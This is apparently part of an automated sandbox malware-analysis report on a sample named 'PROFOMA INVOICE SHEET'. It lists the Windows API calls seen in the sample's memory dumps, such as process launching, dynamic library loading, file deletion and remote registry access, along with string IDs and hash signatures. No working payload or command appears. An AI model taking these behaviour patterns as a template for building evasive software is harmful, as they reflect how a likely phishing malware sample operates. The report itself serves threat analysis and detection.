                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info_wcslen$Default
                                    • String ID: 0
                                    • API String ID: 1227352736-4108050209
                                    • Opcode ID: 85f2389a78cc188e108bfeeece4e1a9ba58c03fc6907fda349ef68336b32d395
                                    • Instruction ID: 7af5cdea81c0aaf29f45c22f180bdfc8f08e3b3eb30e42354592c2f7eee82e5d
                                    • Opcode Fuzzy Hash: 85f2389a78cc188e108bfeeece4e1a9ba58c03fc6907fda349ef68336b32d395
                                    • Instruction Fuzzy Hash: AF51F0716243009FC7179F28D894A7B77E8AF49310F04AA2AF9E5D7195DB70D804CB96
                                    APIs
                                    • ShellExecuteExW.SHELL32(0000003C), ref: 0038AEA3
                                      • Part of subcall function 00307620: _wcslen.LIBCMT ref: 00307625
                                    • GetProcessId.KERNEL32(00000000), ref: 0038AF38
                                    • CloseHandle.KERNEL32(00000000), ref: 0038AF67
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CloseExecuteHandleProcessShell_wcslen
                                    • String ID: <$@
                                    • API String ID: 146682121-1426351568
                                    • Opcode ID: a3c42bf19e14f07efbafc4061442276277a2a9b0325e04591990feaff88d2db9
                                    • Instruction ID: a9ae9f90fce6a91523102a4df1407b823ccbea1b4182eb1ea471d74122779ae9
                                    • Opcode Fuzzy Hash: a3c42bf19e14f07efbafc4061442276277a2a9b0325e04591990feaff88d2db9
                                    • Instruction Fuzzy Hash: EE717970A00619DFDB16EF54C894A9EBBF0BF08310F05849AE816AF392CB35ED45CB91
                                    APIs
                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00367206
                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0036723C
                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0036724D
                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 003672CF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                    • String ID: DllGetClassObject
                                    • API String ID: 753597075-1075368562
                                    • Opcode ID: f7ef04d47b18c83126a6bdea0e4a4f98c2dcb5e6e36990bcdbe2ca5475176b04
                                    • Instruction ID: 65b166b90fabb71d5d9ff3086f96d4fa3ae4e567d62a4274f393663350c9d3ec
                                    • Opcode Fuzzy Hash: f7ef04d47b18c83126a6bdea0e4a4f98c2dcb5e6e36990bcdbe2ca5475176b04
                                    • Instruction Fuzzy Hash: 18418D71A04204AFDB16CF54C895A9A7BB9EF44318F5584A9FD059F20ED7B1D940CBA0
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _wcslen
                                    • String ID: HKEY_LOCAL_MACHINE$HKLM
                                    • API String ID: 176396367-4004644295
                                    • Opcode ID: 53f60a182fbb159bd993918a2ea1b51c5c92e19ce0b7552ad42b29bfbacb2df4
                                    • Instruction ID: 25e404b31c417936e429da84b9a5aaba18a2a56db7d285a0e64314f76fb08f74
                                    • Opcode Fuzzy Hash: 53f60a182fbb159bd993918a2ea1b51c5c92e19ce0b7552ad42b29bfbacb2df4
                                    • Instruction Fuzzy Hash: 2D310933A202694BCB2BFF6C98505BF33A15BA1750B07509AEC51AB345EA75CD4097B0
                                    APIs
                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00392F8D
                                    • LoadLibraryW.KERNEL32(?), ref: 00392F94
                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00392FA9
                                    • DestroyWindow.USER32(?), ref: 00392FB1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageSend$DestroyLibraryLoadWindow
                                    • String ID: SysAnimate32
                                    • API String ID: 3529120543-1011021900
                                    • Opcode ID: 04d80ed92464a698b3added1c922753bb7fe5a361a61bec71a6917fc8ca1ebe4
                                    • Instruction ID: 6d07cc64c35c77fb5da078c53149257aa068ebbf4055bd6013d9b4452b497692
                                    • Opcode Fuzzy Hash: 04d80ed92464a698b3added1c922753bb7fe5a361a61bec71a6917fc8ca1ebe4
                                    • Instruction Fuzzy Hash: 0821FD72204A05BBEF128F64DC80FBB77BDEB59364F110619F952D6090C331DC519760
                                    APIs
                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00324D1E,003328E9,?,00324CBE,003328E9,003C88B8,0000000C,00324E15,003328E9,00000002), ref: 00324D8D
                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00324DA0
                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00324D1E,003328E9,?,00324CBE,003328E9,003C88B8,0000000C,00324E15,003328E9,00000002,00000000), ref: 00324DC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: AddressFreeHandleLibraryModuleProc
                                    • String ID: CorExitProcess$mscoree.dll
                                    • API String ID: 4061214504-1276376045
                                    • Opcode ID: 22604253c199c190b67969a946f30f49b17a9b092b190181ab12ddc191752986
                                    • Instruction ID: 2ce7a92ccf17e3c1de5bcf26499dd66804d0bf1d564fdca907df65d1f5a39648
                                    • Opcode Fuzzy Hash: 22604253c199c190b67969a946f30f49b17a9b092b190181ab12ddc191752986
                                    • Instruction Fuzzy Hash: A0F06234A50218BBDB179F90EC49BEDBFB9EF44751F4101A5F80AA2261CB329D40CB94
                                    APIs
                                    • LoadLibraryA.KERNEL32 ref: 0035D3AD
                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0035D3BF
                                    • FreeLibrary.KERNEL32(00000000), ref: 0035D3E5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Library$AddressFreeLoadProc
                                    • String ID: GetSystemWow64DirectoryW$X64
                                    • API String ID: 145871493-2590602151
                                    • Opcode ID: 0c6eb9192d7b6fe707e4de3b2d6ab7586a3cc7612402d64be1ed2988005fc6a1
                                    • Instruction ID: 3bab1e451e1edab37a6ece71daa0f1b545a3edfb76476b45024c0846605236e4
                                    • Opcode Fuzzy Hash: 0c6eb9192d7b6fe707e4de3b2d6ab7586a3cc7612402d64be1ed2988005fc6a1
                                    • Instruction Fuzzy Hash: D4F02039806A20DBDB3357208C48DA97228AF00703F52996AEC03E2534DB30CD88CA82
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00304EDD,?,003D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00304E9C
                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00304EAE
                                    • FreeLibrary.KERNEL32(00000000,?,?,00304EDD,?,003D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00304EC0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Library$AddressFreeLoadProc
                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                    • API String ID: 145871493-3689287502
                                    • Opcode ID: 1e39a12ded61c9098c51fa808649e4eb93b7976ecc98c96672dad38aefd659d2
                                    • Instruction ID: 9ed52ae4693e45b9fca6ffd672d92ace62e0c2825bc6f36d57a20ffc5e4e51c2
                                    • Opcode Fuzzy Hash: 1e39a12ded61c9098c51fa808649e4eb93b7976ecc98c96672dad38aefd659d2
                                    • Instruction Fuzzy Hash: 74E08635A135225BD2231725BC28B9BA558AF81B62F064116FD05D2150DB60CE0281E4
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00343CDE,?,003D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00304E62
                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00304E74
                                    • FreeLibrary.KERNEL32(00000000,?,?,00343CDE,?,003D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00304E87
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Library$AddressFreeLoadProc
                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                    • API String ID: 145871493-1355242751
                                    • Opcode ID: 14f6baeee700b54e06d7b543f24a40af8131087b5d66d18172334fb125d9fb07
                                    • Instruction ID: 853ed282dc256f0331fca2faab0d023f7b6271856025dac05709d607b7ebda36
                                    • Opcode Fuzzy Hash: 14f6baeee700b54e06d7b543f24a40af8131087b5d66d18172334fb125d9fb07
                                    • Instruction Fuzzy Hash: E9D01235513621579A231B25BC28ECB6A1CAF85B51746551AFA09E2194CF62CE01C5D4
                                    APIs
                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00372C05
                                    • DeleteFileW.KERNEL32(?), ref: 00372C87
                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00372C9D
                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00372CAE
                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00372CC0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: File$Delete$Copy
                                    • String ID:
                                    • API String ID: 3226157194-0
                                    • Opcode ID: 536cc17077e9d8990494c9abb86b8bfc2881e01fcede52dd4ce7faddcbc1a008
                                    • Instruction ID: 711d07ebcb857d36461641aa9145ff58bf035d12545e3b6cbd33c51f92668dd5
                                    • Opcode Fuzzy Hash: 536cc17077e9d8990494c9abb86b8bfc2881e01fcede52dd4ce7faddcbc1a008
                                    • Instruction Fuzzy Hash: 1CB16F71901129ABDF26DFA4CC85EDFB7BDEF49350F1080AAF509EA141EB349A448F61
                                    APIs
                                    • GetCurrentProcessId.KERNEL32 ref: 0038A427
                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0038A435
                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0038A468
                                    • CloseHandle.KERNEL32(?), ref: 0038A63D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                    • String ID:
                                    • API String ID: 3488606520-0
                                    • Opcode ID: b2b2602e6009fb00616044082bb5de39c08ae513bd077cb78faf235c385180d9
                                    • Instruction ID: 76567e245d6e8b8ec6a23296e11f06b656aedf81fcfdf99dd168340dad0386a7
                                    • Opcode Fuzzy Hash: b2b2602e6009fb00616044082bb5de39c08ae513bd077cb78faf235c385180d9
                                    • Instruction Fuzzy Hash: 37A1D4716047019FE725EF28C892F2AB7E5AF84714F14885DF5999B3D2DBB0EC408B92
                                    APIs
                                      • Part of subcall function 0036DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0036CF22,?), ref: 0036DDFD
                                      • Part of subcall function 0036DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0036CF22,?), ref: 0036DE16
                                      • Part of subcall function 0036E199: GetFileAttributesW.KERNEL32(?,0036CF95), ref: 0036E19A
                                    • lstrcmpiW.KERNEL32(?,?), ref: 0036E473
                                    • MoveFileW.KERNEL32(?,?), ref: 0036E4AC
                                    • _wcslen.LIBCMT ref: 0036E5EB
                                    • _wcslen.LIBCMT ref: 0036E603
                                    • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0036E650
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                    • String ID:
                                    • API String ID: 3183298772-0
                                    • Opcode ID: a43b15e4bf766a028373fc93ddabe129147926f3ea3603ed8df5461c0c899dff
                                    • Instruction ID: 63945ffa7a30176b9a264152ca2827a4b03ba121d408b463522f3c98c7ba09e9
                                    • Opcode Fuzzy Hash: a43b15e4bf766a028373fc93ddabe129147926f3ea3603ed8df5461c0c899dff
                                    • Instruction Fuzzy Hash: DB5185B24083845BC726EBA0DC919DF73ECAF85340F00891EF689D7195EF74A68C875A
                                    APIs
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                      • Part of subcall function 0038C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0038B6AE,?,?), ref: 0038C9B5
                                      • Part of subcall function 0038C998: _wcslen.LIBCMT ref: 0038C9F1
                                      • Part of subcall function 0038C998: _wcslen.LIBCMT ref: 0038CA68
                                      • Part of subcall function 0038C998: _wcslen.LIBCMT ref: 0038CA9E
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0038BAA5
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0038BB00
                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0038BB63
                                    • RegCloseKey.ADVAPI32(?,?), ref: 0038BBA6
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0038BBB3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                    • String ID:
                                    • API String ID: 826366716-0
                                    • Opcode ID: 8284c96e5ce535f3989381c312c71bf2cfb2393575062e4112556355838ccae9
                                    • Instruction ID: f9ce27b0c68c4bb58ea8638f038776e9b16e06bc7e2fdd47b0f7b000a601fd89
                                    • Opcode Fuzzy Hash: 8284c96e5ce535f3989381c312c71bf2cfb2393575062e4112556355838ccae9
                                    • Instruction Fuzzy Hash: 4B619131209342AFD716EF14C490E2ABBE9FF84308F55859DF4994B2A2DB31ED45CB92
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 00368BCD
                                    • VariantClear.OLEAUT32 ref: 00368C3E
                                    • VariantClear.OLEAUT32 ref: 00368C9D
                                    • VariantClear.OLEAUT32(?), ref: 00368D10
                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00368D3B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Variant$Clear$ChangeInitType
                                    • String ID:
                                    • API String ID: 4136290138-0
                                    • Opcode ID: 625c35dc4682a2e18d50bd594e72af654658074e4a0518d6593224b028808092
                                    • Instruction ID: 7719785b85951fe6f14556e69b517031ac28c4464a8f2c75f2f1bf94caeb2164
                                    • Opcode Fuzzy Hash: 625c35dc4682a2e18d50bd594e72af654658074e4a0518d6593224b028808092
                                    • Instruction Fuzzy Hash: AF5169B5A00219EFCB15CF68C884AAAB7F8FF8D314F158559E905DB354E730E911CBA0
                                    APIs
                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00378BAE
                                    • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00378BDA
                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00378C32
                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00378C57
                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00378C5F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: PrivateProfile$SectionWrite$String
                                    • String ID:
                                    • API String ID: 2832842796-0
                                    • Opcode ID: 6acb566ac4586e216b20fa71301aae6697b40dc9b7b7cfa52d4423428d28e4c4
                                    • Instruction ID: f031b8d0eb0f2428ed7db351cc06196fd297f78cd8fdcd5828608ba52be5260b
                                    • Opcode Fuzzy Hash: 6acb566ac4586e216b20fa71301aae6697b40dc9b7b7cfa52d4423428d28e4c4
                                    • Instruction Fuzzy Hash: 8D517B34A002159FCB16DF64C894AAABBF5FF49314F08C458E849AB3A2CB35ED41CB90
                                    APIs
                                    • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00388F40
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00388FD0
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00388FEC
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00389032
                                    • FreeLibrary.KERNEL32(00000000), ref: 00389052
                                      • Part of subcall function 0031F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00371043,?,753CE610), ref: 0031F6E6
                                      • Part of subcall function 0031F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0035FA64,00000000,00000000,?,?,00371043,?,753CE610,?,0035FA64), ref: 0031F70D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                    • String ID:
                                    • API String ID: 666041331-0
                                    • Opcode ID: 80e1c39f852f0bffe04174b3690f5dee57ac763ffb63e92dd41f7e521e9eac91
                                    • Instruction ID: 48b345b044d32a535b4dd0c9b59e8a4cb7e5e1cd6c49397bce050c05954635d4
                                    • Opcode Fuzzy Hash: 80e1c39f852f0bffe04174b3690f5dee57ac763ffb63e92dd41f7e521e9eac91
                                    • Instruction Fuzzy Hash: 08515A74601205DFCB12EF58C4949ADBBF1FF49314B4980A9E90AAF362DB31ED85CB90
                                    APIs
